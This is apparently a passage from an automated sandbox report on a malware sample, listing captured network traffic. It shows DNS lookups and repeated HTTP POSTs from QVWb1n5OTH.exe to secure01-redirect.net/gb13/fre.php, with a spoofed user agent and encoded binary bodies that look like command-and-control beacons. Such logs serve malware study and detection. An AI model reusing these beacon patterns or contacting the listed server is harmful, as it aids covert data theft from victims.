                                                            Dec 1, 2021 20:19:47.785325050 CET804981785.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:48.639542103 CET804981785.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:48.639745951 CET4981780192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:48.639806986 CET4981780192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:48.687222958 CET804981785.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:49.253000975 CET4981980192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:49.300107002 CET804981985.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:49.300338030 CET4981980192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:49.302288055 CET4981980192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:49.348915100 CET804981985.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:49.349103928 CET4981980192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:49.396382093 CET804981985.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:50.210336924 CET804981985.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:50.210587978 CET4981980192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:50.210681915 CET4981980192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:50.257652044 CET804981985.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:50.737838984 CET4982080192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:50.784778118 CET804982085.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:50.784941912 CET4982080192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:50.786489964 CET4982080192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:50.833503962 CET804982085.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:50.833630085 CET4982080192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:50.880405903 CET804982085.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:51.721692085 CET804982085.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:51.722033978 CET4982080192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:51.722130060 CET4982080192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:51.769547939 CET804982085.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:52.312294960 CET4982180192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:52.359023094 CET804982185.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:52.359251976 CET4982180192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:52.360769033 CET4982180192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:52.407702923 CET804982185.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:52.407926083 CET4982180192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:52.454945087 CET804982185.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:53.252924919 CET804982185.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:53.253118038 CET4982180192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:53.253181934 CET4982180192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:53.300251007 CET804982185.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:53.753169060 CET4982280192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:53.800152063 CET804982285.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:53.800379038 CET4982280192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:53.801918983 CET4982280192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:53.848813057 CET804982285.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:53.848948002 CET4982280192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:53.895694971 CET804982285.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:54.719422102 CET804982285.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:54.719629049 CET4982280192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:54.719696999 CET4982280192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:54.767221928 CET804982285.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:55.296116114 CET4982380192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:55.343416929 CET804982385.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:55.343719959 CET4982380192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:55.345262051 CET4982380192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:55.392630100 CET804982385.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:55.392816067 CET4982380192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:55.440073967 CET804982385.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:57.639204025 CET804982385.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:57.639602900 CET4982380192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:57.639712095 CET4982380192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:57.687199116 CET804982385.209.2.33192.168.11.20

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 1, 2021 20:19:31.833158970 CET5859353192.168.11.201.1.1.1
                                                            Dec 1, 2021 20:19:32.754055023 CET5274453192.168.11.201.1.1.1
                                                            Dec 1, 2021 20:19:33.245706081 CET5297953192.168.11.201.1.1.1
                                                            Dec 1, 2021 20:19:34.936940908 CET6346253192.168.11.201.1.1.1
                                                            Dec 1, 2021 20:19:36.275649071 CET5061053192.168.11.201.1.1.1
                                                            Dec 1, 2021 20:19:36.519002914 CET53506101.1.1.1192.168.11.20

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Dec 1, 2021 20:19:31.833158970 CET192.168.11.201.1.1.10xfecbStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                            Dec 1, 2021 20:19:32.754055023 CET192.168.11.201.1.1.10xc367Standard query (0)erubbw.bl.files.1drv.comA (IP address)IN (0x0001)
                                                            Dec 1, 2021 20:19:33.245706081 CET192.168.11.201.1.1.10x3342Standard query (0)skydrive.live.comA (IP address)IN (0x0001)
                                                            Dec 1, 2021 20:19:34.936940908 CET192.168.11.201.1.1.10xc5aaStandard query (0)ervmpg.bl.files.1drv.comA (IP address)IN (0x0001)
                                                            Dec 1, 2021 20:19:36.275649071 CET192.168.11.201.1.1.10xbd2bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Dec 1, 2021 20:19:31.842365026 CET1.1.1.1192.168.11.200xfecbNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 1, 2021 20:19:32.873282909 CET1.1.1.1192.168.11.200xc367No error (0)erubbw.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                            Dec 1, 2021 20:19:32.873282909 CET1.1.1.1192.168.11.200xc367No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 1, 2021 20:19:33.381452084 CET1.1.1.1192.168.11.200x3342No error (0)skydrive.live.comodwebpl.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 1, 2021 20:19:35.040615082 CET1.1.1.1192.168.11.200xc5aaNo error (0)ervmpg.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                            Dec 1, 2021 20:19:35.040615082 CET1.1.1.1192.168.11.200xc5aaNo error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 1, 2021 20:19:36.519002914 CET1.1.1.1192.168.11.200xbd2bNo error (0)secure01-redirect.net85.209.2.33A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • secure01-redirect.net

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.11.204981485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:36.569315910 CET194OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 178
                                                            Connection: close
                                                            Dec 1, 2021 20:19:38.258430004 CET194INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:37 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 15
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.11.204981585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:44.459399939 CET195OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 3206
                                                            Connection: close
                                                            Dec 1, 2021 20:19:45.505903006 CET199INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:44 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 15
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10192.168.11.204982585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:19:59.598023891 CET216OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:00.438632011 CET216INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:20:59 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            100192.168.11.204992285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            101192.168.11.204992385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            102192.168.11.204992485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            103192.168.11.204992585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            104192.168.11.204992685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            105192.168.11.204992785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            106192.168.11.204992885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            107192.168.11.204992985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            108192.168.11.204993085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            109192.168.11.204993185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11192.168.11.204982685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:01.099822998 CET217OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:02.026537895 CET218INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:01 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            110192.168.11.204993285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            111192.168.11.204993385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            112192.168.11.204993485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            113192.168.11.204993585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            114192.168.11.204993685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            115192.168.11.204993785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            116192.168.11.204993885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            117192.168.11.204993985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            118192.168.11.204994085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            119192.168.11.204994185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12192.168.11.204982885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:02.677275896 CET340OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:03.592915058 CET341INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:02 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            120192.168.11.204994285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            121192.168.11.204994385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            122192.168.11.204994485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            123192.168.11.204994585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            124192.168.11.204994685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            125192.168.11.204994785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            126192.168.11.204994885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            127192.168.11.204994985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            128192.168.11.204995085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            129192.168.11.204995185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13192.168.11.204982985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:04.266433954 CET342OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:05.102262974 CET342INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:04 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            130192.168.11.204995285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            131192.168.11.204995385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            132192.168.11.204995485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            133192.168.11.204995585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            134192.168.11.204995685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            135192.168.11.204995785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            136192.168.11.204995885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            137192.168.11.204996085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            138192.168.11.204996185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            139192.168.11.204996285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            14192.168.11.204983085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:05.719929934 CET343OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:06.589611053 CET344INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:05 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            140192.168.11.204996385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            141192.168.11.204996485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            142192.168.11.204996585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            143192.168.11.204996685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            144192.168.11.204996785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            145192.168.11.204996885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            146192.168.11.204996985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            147192.168.11.204997085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            148192.168.11.204997185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            149192.168.11.204997285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            15192.168.11.204983285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:07.238523960 CET350OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:08.151087046 CET351INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:07 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            150192.168.11.204997385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            151192.168.11.204997485.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            152192.168.11.204997585.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            153192.168.11.204997685.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            154192.168.11.204997785.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            155192.168.11.204997885.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            156192.168.11.204997985.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            157192.168.11.204998085.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            158192.168.11.204998185.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            159192.168.11.204998285.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            16192.168.11.204983385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 1, 2021 20:20:08.754488945 CET352OUTPOST /gb13/fre.php HTTP/1.0
                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                            Host: secure01-redirect.net
                                                            Accept: */*
                                                            Content-Type: application/octet-stream
                                                            Content-Encoding: binary
                                                            Content-Key: F810C324
                                                            Content-Length: 151
                                                            Connection: close
                                                            Dec 1, 2021 20:20:09.731313944 CET353INHTTP/1.0 404 Not Found
                                                            Date: Wed, 01 Dec 2021 19:21:08 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            X-Powered-By: PHP/5.4.16
                                                            Status: 404 Not Found
                                                            Content-Length: 23
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                            Data Ascii: File not found.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            160192.168.11.204998385.209.2.3380C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
